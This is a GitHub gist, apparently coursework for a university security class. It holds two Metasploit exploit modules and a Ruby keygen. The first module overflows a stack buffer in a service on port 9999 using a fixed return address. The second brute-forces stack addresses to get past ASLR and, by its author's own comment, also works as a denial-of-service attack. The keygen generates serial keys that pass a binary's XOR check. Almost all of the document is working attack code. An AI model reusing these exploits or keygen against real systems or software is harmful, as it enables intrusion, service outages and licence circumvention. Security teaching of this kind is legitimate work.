Skip to content

Instantly share code, notes, and snippets.

@PragTob PragTob/istask11.rb
Created Dec 8, 2014

Embed
What would you like to do?
#myfirstrubyscript
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
#
# This exploit affects the debian Linuxmachine from our IS Special task.
#
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Istask11',
'Description' => %q{
This explois was made as part of the Internet Security Special Task.
},
'Author' => 'Tobi',
'Version' => '$Revision: 5 $',
'Payload' =>
{
'Space' => 1540,
'BadChars' => "\x00",
},
'Targets' =>
[
# Target 0: Linux
[
'Linux',
{
'Platform' => 'linux',
'Ret' => 0xbfffef34,
'BufSize' => 1640 # as found out by debugging/boomerang
}
],
],
'DefaultTarget' => 0))
#set a default port
register_options(
[
Opt::RPORT(9999)
], self.class)
end
#
# The exploit method connects to the remote service and sends the payload
# followed by the fake return address and the nullbyte to end the string (otherwise it'd continue reading data which woould be bad
#
def exploit
connect
print_status ("Start exploiting the vulnerable debianmachine")
#
# Build the buffer for transmission
# the Nops after the payload are somehow necessary (didn't work without them), seems like payloads with push would overwrite themselves
# so I left NOPs which can be written instead of them (for now there are 100 nops, should be more than enough)
#
buf = payload.encoded + make_nops(target['BufSize'] - payload.encoded.length) + [target.ret].pack('V') + "\x00"
print_status("Sending #{buf.length} byte data")
# Send it off
sock.put(buf)
sock.get
handler
end
end
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
#
# This exploit affects the debian Linuxmachine from our IS Special task.
# take note of the description as I couldn't find another way in time.
# possible problem with overloading the process table of gentoo so that afterwards you can't do anything with the shell and it was an excellent DoS-attack....
#
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Istask12',
'Description' => %q{
This explois was made as part of the Internet Security Special Task.
you got to watch the exploit on execution time... as soon as you see a dialog spawn (soemnthing out of the ordinary output) you got to press ctrl + C. afterwards
through session and session -i you can access the shell again. Yes it does not work with really high addresses, sadly. But than it performs an excellent DoS attack (as well as if you don't press ctrl+c).
},
'Author' => 'Tobi',
'Version' => '$Revision: 100 $',
'Payload' =>
{
'Space' => 400, #should be enough for most of the payloads
'DisableNops' => true, #disabled cause I want to make them manually so I know how many of them i got before the shellcode starts
'BadChars' => "\x00",
},
'Targets' =>
[
# Target 0: Linux
[
'Linux',
{
'Platform' => 'linux',
'Ret' => 0xbf800000, # stack is 8MB big... main shouldn't push that much data on the stack so that we miss out our desired buffer. Plus stack address always starts oxbf (as only 24 byte are randomized)
'BufSize' => 1032 # as found out by debugging/boomerang
}
],
],
'DefaultTarget' => 0))
#set a default port
register_options(
[
Opt::RPORT(9999)
], self.class)
end
#
# this time the enemy is secured by ASLR, fortunately not the PaX one. We'll use brute force (which will unfortunately create to many processes for gentoo to handle).
#
def exploit
print_status ("Start exploiting the vulnerable gentoomachine")
#
# initialization here we determine a couple of important values
#
return_address = target.ret
nops_after_payload = 12 # 4- aligned
nops_before_payload = target['BufSize'] - payload.encoded.length - nops_after_payload
print_status("nops_before_payload: #{nops_before_payload}")
# initialize the constant part of the buffer (for performancereasons)
standard_buf = make_nops(nops_before_payload) + payload.encoded + make_nops(nops_after_payload )
# can't be really sure whether the payloadlength is always 4-aligned (at least I don't think so )
payload_offset = 4- payload.encoded.length % 4
# as long as we don't reach a region where our buffer can't be we keep on trying.
while (return_address < 0xc0000000)
connect
buf = standard_buf + [return_address].pack('V') + "\x00" #building the buffer with the returnaddress we are currently trying (little Endian)
print_status("trying address #{return_address} ")
# Send it off
sock.put(buf)
sock.get
handler
return_address += (nops_before_payload + payload_offset)# incrementing the returnaddress to try new ones (offset to keep 4-aligned
disconnect
end
end
end
# This is my keygen (Tobias Pfeiffer) - I don't need ascii-art like that lame lethal-guitar guy
## the numbers as taken from the binary, which are used to XOR encrypt the key there
encryptnumbers= [0x45, 0x3A ,0xAB, 0xC8 ,0xCC ,0x15 ,0xE3, 0x7A]
# at first we create an array of possible encrypted values for each position (of the key), except the last one (key is 9 chars long)
# sicne ruby doesn't really support multidimensional arrays out of the box we got
# to add an array as an element
possencr = Array.new
for i in 0..7 do
#we're going to temporarily save the found values here
temparray = []
for j in 0..255 do
keychar = j ^ encryptnumbers[i]
# if keychar is printable
if ((keychar >= 32) and (keychar <= 126))
temparray << j
end
end
possencr << temparray
end
# in the resulting array, the first index is also the index of the keys/encryptnumbers
# the values stored and accessible with the second array are alle possible encryptedchars (95 each as found out)
# note that the numbers are in order (lowest number comes first)
# now we try to genereate a key
crypt = Array.new # saves the crypted signs we chose (cause we need them to make the sum
key = Array.new # saves the corresponding keychars
sum = 0
for i in 0..4 do #just 4 because later on we try to fix things (with the last 3 chars), this part here is pure random
crypt[i] = possencr[i][rand(possencr[i].length)]
# key is automotically printable due to our awesome array
key[i] = crypt[i] ^ encryptnumbers[i]
sum+= crypt[i]
end
# so here will be some magice, we'll use our last 3 chars to adjust the sum in
# such a way that it's between 97 and 122.
# we're lucky, as I found out our last 3 possible encrypted chars, have no holes
# in the array, it's 95 elements each and all consecutive
# 109 = (sum+possencr[5][0]+possencr[6][0]+possencr[7][0]+offset)&255 -- that's just something o remind me how I want to calculate things, 109 because it's the middle of 97 and 122
offset = 109- ((sum+possencr[5][0]+possencr[6][0]+possencr[7][0])&255) # &255 ---> take the last byte (least significant)
if offset <0
offset = 256 + offset
end
# we simbly divide our offset equally to all chars, we could have problems with rounding, but we don't since it's a maximum of +-2 and with 109 we got more than enough space
index = offset/3
# now make the damned last three chars!
for i in 5..7 do
crypt[i] = possencr[i][index]
key[i] = crypt[i] ^ encryptnumbers[i]
sum+= crypt[i]
end
# we just need the last byte
sum = sum & 255
key[8] = sum
#make them chars (not numbers)
for i in 0..8 do
key[i]=key[i].chr
end
# make a string out of the array of chars
key = key.to_s
# output the key - BAM!
puts key
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.